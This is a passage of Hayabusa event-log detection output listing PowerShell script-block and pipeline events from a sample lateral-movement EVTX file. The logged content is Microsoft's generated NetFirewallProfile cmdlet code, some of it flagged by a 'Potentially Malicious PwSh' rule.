$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.701 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.701 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.702 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.733 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.733 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 